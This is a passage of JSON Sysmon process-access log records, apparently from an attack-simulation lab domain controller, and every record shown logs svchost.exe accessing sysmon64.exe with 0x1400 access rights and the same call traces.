C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3945,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3946,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3947,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3948,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3949,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3950,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3951,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3952,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 